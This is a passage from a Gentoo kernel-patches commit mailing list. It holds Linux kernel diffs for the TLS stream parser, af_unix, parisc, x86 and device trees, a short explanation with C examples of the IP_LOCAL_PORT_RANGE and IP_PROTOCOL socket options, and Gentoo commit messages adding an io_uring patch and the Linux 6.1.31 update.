++	return skb;
++}
++
++/* Create a new skb with the contents of input copied to its page frags */
++static struct sk_buff *tls_strp_msg_make_copy(struct tls_strparser *strp)
++{
++	struct strp_msg *rxm;
++	struct sk_buff *skb;
++
++	skb = tls_strp_skb_copy(strp, strp->anchor, strp->stm.offset,
++				strp->stm.full_len);
++	if (!skb)
++		return NULL;
++
+ 	rxm = strp_msg(skb);
+ 	rxm->offset = 0;
+ 	return skb;
+@@ -180,22 +196,22 @@ static void tls_strp_flush_anchor_copy(struct tls_strparser *strp)
+ 	for (i = 0; i < shinfo->nr_frags; i++)
+ 		__skb_frag_unref(&shinfo->frags[i], false);
+ 	shinfo->nr_frags = 0;
++	if (strp->copy_mode) {
++		kfree_skb_list(shinfo->frag_list);
++		shinfo->frag_list = NULL;
++	}
+ 	strp->copy_mode = 0;
++	strp->mixed_decrypted = 0;
+ }
+ 
+-static int tls_strp_copyin(read_descriptor_t *desc, struct sk_buff *in_skb,
+-			   unsigned int offset, size_t in_len)
++static int tls_strp_copyin_frag(struct tls_strparser *strp, struct sk_buff *skb,
++				struct sk_buff *in_skb, unsigned int offset,
++				size_t in_len)
+ {
+-	struct tls_strparser *strp = (struct tls_strparser *)desc->arg.data;
+-	struct sk_buff *skb;
+-	skb_frag_t *frag;
+ 	size_t len, chunk;
++	skb_frag_t *frag;
+ 	int sz;
+ 
+-	if (strp->msg_ready)
+-		return 0;
+-
+-	skb = strp->anchor;
+ 	frag = &skb_shinfo(skb)->frags[skb->len / PAGE_SIZE];
+ 
+ 	len = in_len;
+@@ -208,19 +224,26 @@ static int tls_strp_copyin(read_descriptor_t *desc, struct sk_buff *in_skb,
+ 					   skb_frag_size(frag),
+ 					   chunk));
+ 
+-		sz = tls_rx_msg_size(strp, strp->anchor);
+-		if (sz < 0) {
+-			desc->error = sz;
+-			return 0;
+-		}
+-
+-		/* We may have over-read, sz == 0 is guaranteed under-read */
+-		if (sz > 0)
+-			chunk =	min_t(size_t, chunk, sz - skb->len);
+-
+ 		skb->len += chunk;
+ 		skb->data_len += chunk;
+ 		skb_frag_size_add(frag, chunk);
++
++		sz = tls_rx_msg_size(strp, skb);
++		if (sz < 0)
++			return sz;
++
++		/* We may have over-read, sz == 0 is guaranteed under-read */
++		if (unlikely(sz && sz < skb->len)) {
++			int over = skb->len - sz;
++
++			WARN_ON_ONCE(over > chunk);
++			skb->len -= over;
++			skb->data_len -= over;
++			skb_frag_size_add(frag, -over);
++
++			chunk -= over;
++		}
++
+ 		frag++;
+ 		len -= chunk;
+ 		offset += chunk;
+@@ -247,15 +270,99 @@ static int tls_strp_copyin(read_descriptor_t *desc, struct sk_buff *in_skb,
+ 		offset += chunk;
+ 	}
+ 
+-	if (strp->stm.full_len == skb->len) {
++read_done:
++	return in_len - len;
++}
++
++static int tls_strp_copyin_skb(struct tls_strparser *strp, struct sk_buff *skb,
++			       struct sk_buff *in_skb, unsigned int offset,
++			       size_t in_len)
++{
++	struct sk_buff *nskb, *first, *last;
++	struct skb_shared_info *shinfo;
++	size_t chunk;
++	int sz;
++
++	if (strp->stm.full_len)
++		chunk = strp->stm.full_len - skb->len;
++	else
++		chunk = TLS_MAX_PAYLOAD_SIZE + PAGE_SIZE;
++	chunk = min(chunk, in_len);
++
++	nskb = tls_strp_skb_copy(strp, in_skb, offset, chunk);
++	if (!nskb)
++		return -ENOMEM;
++
++	shinfo = skb_shinfo(skb);
++	if (!shinfo->frag_list) {
++		shinfo->frag_list = nskb;
++		nskb->prev = nskb;
++	} else {
++		first = shinfo->frag_list;
++		last = first->prev;
++		last->next = nskb;
++		first->prev = nskb;
++	}
++
++	skb->len += chunk;
++	skb->data_len += chunk;
++
++	if (!strp->stm.full_len) {
++		sz = tls_rx_msg_size(strp, skb);
++		if (sz < 0)
++			return sz;
++
++		/* We may have over-read, sz == 0 is guaranteed under-read */
++		if (unlikely(sz && sz < skb->len)) {
++			int over = skb->len - sz;
++
++			WARN_ON_ONCE(over > chunk);
++			skb->len -= over;
++			skb->data_len -= over;
++			__pskb_trim(nskb, nskb->len - over);
++
++			chunk -= over;
++		}
++
++		strp->stm.full_len = sz;
++	}
++
++	return chunk;
++}
++
++static int tls_strp_copyin(read_descriptor_t *desc, struct sk_buff *in_skb,
++			   unsigned int offset, size_t in_len)
++{
++	struct tls_strparser *strp = (struct tls_strparser *)desc->arg.data;
++	struct sk_buff *skb;
++	int ret;
++
++	if (strp->msg_ready)
++		return 0;
++
++	skb = strp->anchor;
++	if (!skb->len)
++		skb_copy_decrypted(skb, in_skb);
++	else
++		strp->mixed_decrypted |= !!skb_cmp_decrypted(skb, in_skb);
++
++	if (IS_ENABLED(CONFIG_TLS_DEVICE) && strp->mixed_decrypted)
++		ret = tls_strp_copyin_skb(strp, skb, in_skb, offset, in_len);
++	else
++		ret = tls_strp_copyin_frag(strp, skb, in_skb, offset, in_len);
++	if (ret < 0) {
++		desc->error = ret;
++		ret = 0;
++	}
++
++	if (strp->stm.full_len && strp->stm.full_len == skb->len) {
+ 		desc->count = 0;
+ 
+ 		strp->msg_ready = 1;
+ 		tls_rx_msg_ready(strp);
+ 	}
+ 
+-read_done:
+-	return in_len - len;
++	return ret;
+ }
+ 
+ static int tls_strp_read_copyin(struct tls_strparser *strp)
+@@ -315,15 +422,19 @@ static int tls_strp_read_copy(struct tls_strparser *strp, bool qshort)
+ 	return 0;
+ }
+ 
+-static bool tls_strp_check_no_dup(struct tls_strparser *strp)
++static bool tls_strp_check_queue_ok(struct tls_strparser *strp)
+ {
+ 	unsigned int len = strp->stm.offset + strp->stm.full_len;
+-	struct sk_buff *skb;
++	struct sk_buff *first, *skb;
+ 	u32 seq;
+ 
+-	skb = skb_shinfo(strp->anchor)->frag_list;
+-	seq = TCP_SKB_CB(skb)->seq;
++	first = skb_shinfo(strp->anchor)->frag_list;
++	skb = first;
++	seq = TCP_SKB_CB(first)->seq;
+ 
++	/* Make sure there's no duplicate data in the queue,
++	 * and the decrypted status matches.
++	 */
+ 	while (skb->len < len) {
+ 		seq += skb->len;
+ 		len -= skb->len;
+@@ -331,6 +442,8 @@ static bool tls_strp_check_no_dup(struct tls_strparser *strp)
+ 
+ 		if (TCP_SKB_CB(skb)->seq != seq)
+ 			return false;
++		if (skb_cmp_decrypted(first, skb))
++			return false;
+ 	}
+ 
+ 	return true;
+@@ -411,7 +524,7 @@ static int tls_strp_read_sock(struct tls_strparser *strp)
+ 			return tls_strp_read_copy(strp, true);
+ 	}
+ 
+-	if (!tls_strp_check_no_dup(strp))
++	if (!tls_strp_check_queue_ok(strp))
+ 		return tls_strp_read_copy(strp, false);
+ 
+ 	strp->msg_ready = 1;
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 70eb3bc67126d..5b19b6c53a2cb 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -2552,7 +2552,7 @@ static int unix_read_skb(struct sock *sk, skb_read_actor_t recv_actor)
+ {
+ 	struct unix_sock *u = unix_sk(sk);
+ 	struct sk_buff *skb;
+-	int err, copied;
++	int err;
+ 
+ 	mutex_lock(&u->iolock);
+ 	skb = skb_recv_datagram(sk, MSG_DONTWAIT, &err);
+@@ -2560,10 +2560,7 @@ static int unix_read_skb(struct sock *sk, skb_read_actor_t recv_actor)
+ 	if (!skb)
+ 		return err;
+ 
+-	copied = recv_actor(sk, skb);
+-	kfree_skb(skb);
+-
+-	return copied;
++	return recv_actor(sk, skb);
+ }
+ 
+ /*
+diff --git a/tools/include/uapi/linux/in.h b/tools/include/uapi/linux/in.h
+index 07a4cb149305b..4b7f2df66b995 100644
+--- a/tools/include/uapi/linux/in.h
++++ b/tools/include/uapi/linux/in.h
+@@ -162,6 +162,7 @@ struct in_addr {
+ #define MCAST_MSFILTER			48
+ #define IP_MULTICAST_ALL		49
+ #define IP_UNICAST_IF			50
++#define IP_LOCAL_PORT_RANGE		51
+ 
+ #define MCAST_EXCLUDE	0
+ #define MCAST_INCLUDE	1
+diff --git a/tools/testing/selftests/bpf/Makefile b/tools/testing/selftests/bpf/Makefile
+index 687249d99b5f1..0465ddc81f352 100644
+--- a/tools/testing/selftests/bpf/Makefile
++++ b/tools/testing/selftests/bpf/Makefile
+@@ -193,7 +193,7 @@ $(OUTPUT)/urandom_read: urandom_read.c urandom_read_aux.c $(OUTPUT)/liburandom_r
+ 
+ $(OUTPUT)/sign-file: ../../../../scripts/sign-file.c
+ 	$(call msg,SIGN-FILE,,$@)
+-	$(Q)$(CC) $(shell $(HOSTPKG_CONFIG)--cflags libcrypto 2> /dev/null) \
++	$(Q)$(CC) $(shell $(HOSTPKG_CONFIG) --cflags libcrypto 2> /dev/null) \
+ 		  $< -o $@ \
+ 		  $(shell $(HOSTPKG_CONFIG) --libs libcrypto 2> /dev/null || echo -lcrypto)
+ 
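
The IP_LOCAL_PORT_RANGE socket option added above packs the low and high
bounds of the per-socket ephemeral port range into one 32-bit value (low
bound in bits 0-15, high bound in bits 16-31), and inet_sk_get_local_port_range()
only lets it narrow the window set by the net.ipv4.ip_local_port_range sysctl.
A minimal userspace sketch, assuming only that the toolchain headers may not
yet define the constant (the value 51 comes from the uapi hunk above):

#include <stdio.h>
#include <stdint.h>
#include <netinet/in.h>
#include <sys/socket.h>

#ifndef IP_LOCAL_PORT_RANGE
#define IP_LOCAL_PORT_RANGE 51	/* include/uapi/linux/in.h, see hunk above */
#endif

int main(void)
{
	int fd = socket(AF_INET, SOCK_STREAM, 0);
	/* low bound in the lower 16 bits, high bound in the upper 16 bits */
	uint32_t range = (60000u << 16) | 50000u;
	socklen_t len = sizeof(range);

	if (fd < 0)
		return 1;
	/* do_ip_setsockopt() above rejects lo > hi with EINVAL */
	if (setsockopt(fd, IPPROTO_IP, IP_LOCAL_PORT_RANGE,
		       &range, sizeof(range)) < 0)
		perror("setsockopt(IP_LOCAL_PORT_RANGE)");
	if (getsockopt(fd, IPPROTO_IP, IP_LOCAL_PORT_RANGE,
		       &range, &len) == 0)
		printf("range: %u-%u\n",
		       (unsigned)(range & 0xffff), (unsigned)(range >> 16));
	return 0;
}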

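The new IP_PROTOCOL value works two ways in the hunks above: as a getsockopt()
that reports inet_num, and as per-call ancillary data that lets a hdrincl raw
socket pick the flow protocol used for routing instead of the IPPROTO_RAW
default kept for backward compatibility. A hedged sketch of the cmsg side
(the helper name is made up for illustration; the value 52 and the exact
CMSG_LEN(sizeof(int)) length check come from the hunks above):

#include <string.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <netinet/in.h>
#include <sys/socket.h>

#ifndef IP_PROTOCOL
#define IP_PROTOCOL 52	/* include/uapi/linux/in.h, see hunk above */
#endif

/* Send one pre-built IPv4 packet on an IPPROTO_RAW (hdrincl) socket while
 * overriding the flow protocol for this call only. Sketch, not kernel code. */
static ssize_t send_with_protocol(int fd, const void *pkt, size_t len,
				  const struct sockaddr_in *dst, int proto)
{
	char cbuf[CMSG_SPACE(sizeof(int))] = { 0 };
	struct iovec iov = { .iov_base = (void *)pkt, .iov_len = len };
	struct msghdr msg = {
		.msg_name = (void *)dst,
		.msg_namelen = sizeof(*dst),
		.msg_iov = &iov,
		.msg_iovlen = 1,
		.msg_control = cbuf,
		.msg_controllen = sizeof(cbuf),
	};
	struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);

	cmsg->cmsg_level = IPPROTO_IP;
	cmsg->cmsg_type = IP_PROTOCOL;
	cmsg->cmsg_len = CMSG_LEN(sizeof(int));	/* kernel requires exactly this */
	memcpy(CMSG_DATA(cmsg), &proto, sizeof(proto));	/* valid range is 1..255 */

	return sendmsg(fd, &msg, 0);
}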

* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-06-02 15:07 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-06-02 15:07 UTC (permalink / raw
  To: gentoo-commits

commit:     02b803e1a984fd5e611a5146f52aef31b7a523c0
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Jun  2 15:07:00 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Jun  2 15:07:00 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=02b803e1

io_uring: undeprecate epoll_ctl support

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                       |  4 ++++
 2100_io-uring-undeprecate-epoll-ctl-support.patch | 21 +++++++++++++++++++++
 2 files changed, 25 insertions(+)

diff --git a/0000_README b/0000_README
index 68130982..f6e14669 100644
--- a/0000_README
+++ b/0000_README
@@ -179,6 +179,10 @@ Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758
 
+Patch:  2100_io-uring-undeprecate-epoll-ctl-support.patch
+From:   https://patchwork.kernel.org/project/io-uring/patch/20230506095502.13401-1-info@bnoordhuis.nl/
+Desc:   io_uring: undeprecate epoll_ctl support
+
 Patch:  2900_tmp513-Fix-build-issue-by-selecting-CONFIG_REG.patch
 From:   https://bugs.gentoo.org/710790
 Desc:   tmp513 requires REGMAP_I2C to build.  Select it by default in Kconfig. See bug #710790. Thanks to Phil Stracchino

diff --git a/2100_io-uring-undeprecate-epoll-ctl-support.patch b/2100_io-uring-undeprecate-epoll-ctl-support.patch
new file mode 100644
index 00000000..4c3d3904
--- /dev/null
+++ b/2100_io-uring-undeprecate-epoll-ctl-support.patch
@@ -0,0 +1,21 @@
+io_uring: undeprecate epoll_ctl support
+
+---
+ io_uring/epoll.c | 4 ----
+ 1 file changed, 4 deletions(-)
+
+diff --git a/io_uring/epoll.c b/io_uring/epoll.c
+index 9aa74d2c80bc..89bff2068a19 100644
+--- a/io_uring/epoll.c
++++ b/io_uring/epoll.c
+@@ -25,10 +25,6 @@ int io_epoll_ctl_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ {
+ 	struct io_epoll *epoll = io_kiocb_to_cmd(req, struct io_epoll);
+ 
+-	pr_warn_once("%s: epoll_ctl support in io_uring is deprecated and will "
+-		     "be removed in a future Linux kernel version.\n",
+-		     current->comm);
+-
+ 	if (sqe->buf_index || sqe->splice_fd_in)
+ 		return -EINVAL;
+ 


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-05-30 16:51 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-05-30 16:51 UTC (permalink / raw
  To: gentoo-commits

commit:     1e67700e9800b21293786fa8561f470a0e65ba39
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Tue May 30 16:51:19 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Tue May 30 16:51:19 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=1e67700e

Linux patch 6.1.31

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +-
 1030_linux-6.1.31.patch | 4442 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 4444 insertions(+), 2 deletions(-)

diff --git a/0000_README b/0000_README
index 5f7fb2f0..68130982 100644
--- a/0000_README
+++ b/0000_README
@@ -159,9 +159,9 @@ Patch:  1028_linux-6.1.29.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.29
 
-Patch:  1029_linux-6.1.30.patch
+Patch:  1030_linux-6.1.31.patch
 From:   https://www.kernel.org
-Desc:   Linux 6.1.30
+Desc:   Linux 6.1.31
 
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644

diff --git a/1030_linux-6.1.31.patch b/1030_linux-6.1.31.patch
new file mode 100644
index 00000000..5f21e1ae
--- /dev/null
+++ b/1030_linux-6.1.31.patch
@@ -0,0 +1,4442 @@
+diff --git a/Documentation/devicetree/bindings/usb/cdns,usb3.yaml b/Documentation/devicetree/bindings/usb/cdns,usb3.yaml
+index dc9d6ed0781d2..5d0bfea2c087e 100644
+--- a/Documentation/devicetree/bindings/usb/cdns,usb3.yaml
++++ b/Documentation/devicetree/bindings/usb/cdns,usb3.yaml
+@@ -64,7 +64,7 @@ properties:
+     description:
+       size of memory intended as internal memory for endpoints
+       buffers expressed in KB
+-    $ref: /schemas/types.yaml#/definitions/uint32
++    $ref: /schemas/types.yaml#/definitions/uint16
+ 
+   cdns,phyrst-a-enable:
+     description: Enable resetting of PHY if Rx fail is detected
+diff --git a/Makefile b/Makefile
+index aeb58c7a4baa4..902a6b598c73b 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 30
++SUBLEVEL = 31
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/imx6qdl-mba6.dtsi b/arch/arm/boot/dts/imx6qdl-mba6.dtsi
+index 78555a6188510..7b7e6c2ad190c 100644
+--- a/arch/arm/boot/dts/imx6qdl-mba6.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-mba6.dtsi
+@@ -209,6 +209,7 @@
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_pcie>;
+ 	reset-gpio = <&gpio6 7 GPIO_ACTIVE_LOW>;
++	vpcie-supply = <&reg_pcie>;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi b/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi
+index 87b5e23c766f7..d053ef302fb82 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi
+@@ -98,11 +98,17 @@
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 
+-		ethphy: ethernet-phy@4 {
++		ethphy: ethernet-phy@4 { /* AR8033 or ADIN1300 */
+ 			compatible = "ethernet-phy-ieee802.3-c22";
+ 			reg = <4>;
+ 			reset-gpios = <&gpio1 9 GPIO_ACTIVE_LOW>;
+ 			reset-assert-us = <10000>;
++			/*
++			 * Deassert delay:
++			 * ADIN1300 requires 5ms.
++			 * AR8033   requires 1ms.
++			 */
++			reset-deassert-us = <20000>;
+ 		};
+ 	};
+ };
+diff --git a/arch/arm64/mm/copypage.c b/arch/arm64/mm/copypage.c
+index 6dbc822332f2a..f2fa8a0776e21 100644
+--- a/arch/arm64/mm/copypage.c
++++ b/arch/arm64/mm/copypage.c
+@@ -21,9 +21,10 @@ void copy_highpage(struct page *to, struct page *from)
+ 
+ 	copy_page(kto, kfrom);
+ 
++	if (kasan_hw_tags_enabled())
++		page_kasan_tag_reset(to);
++
+ 	if (system_supports_mte() && page_mte_tagged(from)) {
+-		if (kasan_hw_tags_enabled())
+-			page_kasan_tag_reset(to);
+ 		mte_copy_page_tags(kto, kfrom);
+ 		set_page_mte_tagged(to);
+ 	}
+diff --git a/arch/m68k/kernel/signal.c b/arch/m68k/kernel/signal.c
+index b9f6908a31bc3..ba468b5f3f0b6 100644
+--- a/arch/m68k/kernel/signal.c
++++ b/arch/m68k/kernel/signal.c
+@@ -858,11 +858,17 @@ static inline int rt_setup_ucontext(struct ucontext __user *uc, struct pt_regs *
+ }
+ 
+ static inline void __user *
+-get_sigframe(struct ksignal *ksig, size_t frame_size)
++get_sigframe(struct ksignal *ksig, struct pt_regs *tregs, size_t frame_size)
+ {
+ 	unsigned long usp = sigsp(rdusp(), ksig);
++	unsigned long gap = 0;
+ 
+-	return (void __user *)((usp - frame_size) & -8UL);
++	if (CPU_IS_020_OR_030 && tregs->format == 0xb) {
++		/* USP is unreliable so use worst-case value */
++		gap = 256;
++	}
++
++	return (void __user *)((usp - gap - frame_size) & -8UL);
+ }
+ 
+ static int setup_frame(struct ksignal *ksig, sigset_t *set,
+@@ -880,7 +886,7 @@ static int setup_frame(struct ksignal *ksig, sigset_t *set,
+ 		return -EFAULT;
+ 	}
+ 
+-	frame = get_sigframe(ksig, sizeof(*frame) + fsize);
++	frame = get_sigframe(ksig, tregs, sizeof(*frame) + fsize);
+ 
+ 	if (fsize)
+ 		err |= copy_to_user (frame + 1, regs + 1, fsize);
+@@ -952,7 +958,7 @@ static int setup_rt_frame(struct ksignal *ksig, sigset_t *set,
+ 		return -EFAULT;
+ 	}
+ 
+-	frame = get_sigframe(ksig, sizeof(*frame));
++	frame = get_sigframe(ksig, tregs, sizeof(*frame));
+ 
+ 	if (fsize)
+ 		err |= copy_to_user (&frame->uc.uc_extra, regs + 1, fsize);
+diff --git a/arch/parisc/Kconfig b/arch/parisc/Kconfig
+index a98940e642432..67c26e81e2150 100644
+--- a/arch/parisc/Kconfig
++++ b/arch/parisc/Kconfig
+@@ -129,6 +129,10 @@ config PM
+ config STACKTRACE_SUPPORT
+ 	def_bool y
+ 
++config LOCKDEP_SUPPORT
++	bool
++	default y
++
+ config ISA_DMA_API
+ 	bool
+ 
+diff --git a/arch/parisc/include/asm/cacheflush.h b/arch/parisc/include/asm/cacheflush.h
+index 0bdee67241320..c8b6928cee1ee 100644
+--- a/arch/parisc/include/asm/cacheflush.h
++++ b/arch/parisc/include/asm/cacheflush.h
+@@ -48,6 +48,10 @@ void flush_dcache_page(struct page *page);
+ 
+ #define flush_dcache_mmap_lock(mapping)		xa_lock_irq(&mapping->i_pages)
+ #define flush_dcache_mmap_unlock(mapping)	xa_unlock_irq(&mapping->i_pages)
++#define flush_dcache_mmap_lock_irqsave(mapping, flags)		\
++		xa_lock_irqsave(&mapping->i_pages, flags)
++#define flush_dcache_mmap_unlock_irqrestore(mapping, flags)	\
++		xa_unlock_irqrestore(&mapping->i_pages, flags)
+ 
+ #define flush_icache_page(vma,page)	do { 		\
+ 	flush_kernel_dcache_page_addr(page_address(page)); \
+diff --git a/arch/parisc/kernel/alternative.c b/arch/parisc/kernel/alternative.c
+index 66f5672c70bd4..25c4d6c3375db 100644
+--- a/arch/parisc/kernel/alternative.c
++++ b/arch/parisc/kernel/alternative.c
+@@ -25,7 +25,7 @@ void __init_or_module apply_alternatives(struct alt_instr *start,
+ {
+ 	struct alt_instr *entry;
+ 	int index = 0, applied = 0;
+-	int num_cpus = num_online_cpus();
++	int num_cpus = num_present_cpus();
+ 	u16 cond_check;
+ 
+ 	cond_check = ALT_COND_ALWAYS |
+diff --git a/arch/parisc/kernel/cache.c b/arch/parisc/kernel/cache.c
+index 1d3b8bc8a6233..ca4a302d4365f 100644
+--- a/arch/parisc/kernel/cache.c
++++ b/arch/parisc/kernel/cache.c
+@@ -399,6 +399,7 @@ void flush_dcache_page(struct page *page)
+ 	unsigned long offset;
+ 	unsigned long addr, old_addr = 0;
+ 	unsigned long count = 0;
++	unsigned long flags;
+ 	pgoff_t pgoff;
+ 
+ 	if (mapping && !mapping_mapped(mapping)) {
+@@ -420,7 +421,7 @@ void flush_dcache_page(struct page *page)
+ 	 * to flush one address here for them all to become coherent
+ 	 * on machines that support equivalent aliasing
+ 	 */
+-	flush_dcache_mmap_lock(mapping);
++	flush_dcache_mmap_lock_irqsave(mapping, flags);
+ 	vma_interval_tree_foreach(mpnt, &mapping->i_mmap, pgoff, pgoff) {
+ 		offset = (pgoff - mpnt->vm_pgoff) << PAGE_SHIFT;
+ 		addr = mpnt->vm_start + offset;
+@@ -460,7 +461,7 @@ void flush_dcache_page(struct page *page)
+ 		}
+ 		WARN_ON(++count == 4096);
+ 	}
+-	flush_dcache_mmap_unlock(mapping);
++	flush_dcache_mmap_unlock_irqrestore(mapping, flags);
+ }
+ EXPORT_SYMBOL(flush_dcache_page);
+ 
+diff --git a/arch/parisc/kernel/process.c b/arch/parisc/kernel/process.c
+index c4f8374c7018d..b62d60009fac9 100644
+--- a/arch/parisc/kernel/process.c
++++ b/arch/parisc/kernel/process.c
+@@ -122,13 +122,18 @@ void machine_power_off(void)
+ 	/* It seems we have no way to power the system off via
+ 	 * software. The user has to press the button himself. */
+ 
+-	printk(KERN_EMERG "System shut down completed.\n"
+-	       "Please power this system off now.");
++	printk("Power off or press RETURN to reboot.\n");
+ 
+ 	/* prevent soft lockup/stalled CPU messages for endless loop. */
+ 	rcu_sysrq_start();
+ 	lockup_detector_soft_poweroff();
+-	for (;;);
++	while (1) {
++		/* reboot if user presses RETURN key */
++		if (pdc_iodc_getc() == 13) {
++			printk("Rebooting...\n");
++			machine_restart(NULL);
++		}
++	}
+ }
+ 
+ void (*pm_power_off)(void);
+diff --git a/arch/parisc/kernel/traps.c b/arch/parisc/kernel/traps.c
+index f9696fbf646c4..67b51841dc8b4 100644
+--- a/arch/parisc/kernel/traps.c
++++ b/arch/parisc/kernel/traps.c
+@@ -291,19 +291,19 @@ static void handle_break(struct pt_regs *regs)
+ 	}
+ 
+ #ifdef CONFIG_KPROBES
+-	if (unlikely(iir == PARISC_KPROBES_BREAK_INSN)) {
++	if (unlikely(iir == PARISC_KPROBES_BREAK_INSN && !user_mode(regs))) {
+ 		parisc_kprobe_break_handler(regs);
+ 		return;
+ 	}
+-	if (unlikely(iir == PARISC_KPROBES_BREAK_INSN2)) {
++	if (unlikely(iir == PARISC_KPROBES_BREAK_INSN2 && !user_mode(regs))) {
+ 		parisc_kprobe_ss_handler(regs);
+ 		return;
+ 	}
+ #endif
+ 
+ #ifdef CONFIG_KGDB
+-	if (unlikely(iir == PARISC_KGDB_COMPILED_BREAK_INSN ||
+-		iir == PARISC_KGDB_BREAK_INSN)) {
++	if (unlikely((iir == PARISC_KGDB_COMPILED_BREAK_INSN ||
++		iir == PARISC_KGDB_BREAK_INSN)) && !user_mode(regs)) {
+ 		kgdb_handle_exception(9, SIGTRAP, 0, regs);
+ 		return;
+ 	}
+diff --git a/arch/x86/events/intel/uncore_snbep.c b/arch/x86/events/intel/uncore_snbep.c
+index 8f371f3cbbd24..935081ddf60bc 100644
+--- a/arch/x86/events/intel/uncore_snbep.c
++++ b/arch/x86/events/intel/uncore_snbep.c
+@@ -5822,6 +5822,7 @@ static struct intel_uncore_type spr_uncore_mdf = {
+ };
+ 
+ #define UNCORE_SPR_NUM_UNCORE_TYPES		12
++#define UNCORE_SPR_CHA				0
+ #define UNCORE_SPR_IIO				1
+ #define UNCORE_SPR_IMC				6
+ 
+@@ -6064,12 +6065,22 @@ static int uncore_type_max_boxes(struct intel_uncore_type **types,
+ 	return max + 1;
+ }
+ 
++#define SPR_MSR_UNC_CBO_CONFIG		0x2FFE
++
+ void spr_uncore_cpu_init(void)
+ {
++	struct intel_uncore_type *type;
++	u64 num_cbo;
++
+ 	uncore_msr_uncores = uncore_get_uncores(UNCORE_ACCESS_MSR,
+ 						UNCORE_SPR_MSR_EXTRA_UNCORES,
+ 						spr_msr_uncores);
+ 
++	type = uncore_find_type_by_id(uncore_msr_uncores, UNCORE_SPR_CHA);
++	if (type) {
++		rdmsrl(SPR_MSR_UNC_CBO_CONFIG, num_cbo);
++		type->num_boxes = num_cbo;
++	}
+ 	spr_uncore_iio_free_running.num_boxes = uncore_type_max_boxes(uncore_msr_uncores, UNCORE_SPR_IIO);
+ }
+ 
+diff --git a/arch/x86/kernel/cpu/topology.c b/arch/x86/kernel/cpu/topology.c
+index 5e868b62a7c4e..0270925fe013b 100644
+--- a/arch/x86/kernel/cpu/topology.c
++++ b/arch/x86/kernel/cpu/topology.c
+@@ -79,7 +79,7 @@ int detect_extended_topology_early(struct cpuinfo_x86 *c)
+ 	 * initial apic id, which also represents 32-bit extended x2apic id.
+ 	 */
+ 	c->initial_apicid = edx;
+-	smp_num_siblings = LEVEL_MAX_SIBLINGS(ebx);
++	smp_num_siblings = max_t(int, smp_num_siblings, LEVEL_MAX_SIBLINGS(ebx));
+ #endif
+ 	return 0;
+ }
+@@ -109,7 +109,8 @@ int detect_extended_topology(struct cpuinfo_x86 *c)
+ 	 */
+ 	cpuid_count(leaf, SMT_LEVEL, &eax, &ebx, &ecx, &edx);
+ 	c->initial_apicid = edx;
+-	core_level_siblings = smp_num_siblings = LEVEL_MAX_SIBLINGS(ebx);
++	core_level_siblings = LEVEL_MAX_SIBLINGS(ebx);
++	smp_num_siblings = max_t(int, smp_num_siblings, LEVEL_MAX_SIBLINGS(ebx));
+ 	core_plus_mask_width = ht_mask_width = BITS_SHIFT_NEXT_LEVEL(eax);
+ 	die_level_siblings = LEVEL_MAX_SIBLINGS(ebx);
+ 	pkg_mask_width = die_plus_mask_width = BITS_SHIFT_NEXT_LEVEL(eax);
+diff --git a/arch/x86/kernel/dumpstack.c b/arch/x86/kernel/dumpstack.c
+index 0bf6779187dda..f18ca44c904b7 100644
+--- a/arch/x86/kernel/dumpstack.c
++++ b/arch/x86/kernel/dumpstack.c
+@@ -195,7 +195,6 @@ static void show_trace_log_lvl(struct task_struct *task, struct pt_regs *regs,
+ 	printk("%sCall Trace:\n", log_lvl);
+ 
+ 	unwind_start(&state, task, regs, stack);
+-	stack = stack ? : get_stack_pointer(task, regs);
+ 	regs = unwind_get_entry_regs(&state, &partial);
+ 
+ 	/*
+@@ -214,9 +213,13 @@ static void show_trace_log_lvl(struct task_struct *task, struct pt_regs *regs,
+ 	 * - hardirq stack
+ 	 * - entry stack
+ 	 */
+-	for ( ; stack; stack = PTR_ALIGN(stack_info.next_sp, sizeof(long))) {
++	for (stack = stack ?: get_stack_pointer(task, regs);
++	     stack;
++	     stack = stack_info.next_sp) {
+ 		const char *stack_name;
+ 
++		stack = PTR_ALIGN(stack, sizeof(long));
++
+ 		if (get_stack_info(stack, task, &stack_info, &visit_mask)) {
+ 			/*
+ 			 * We weren't on a valid stack.  It's possible that
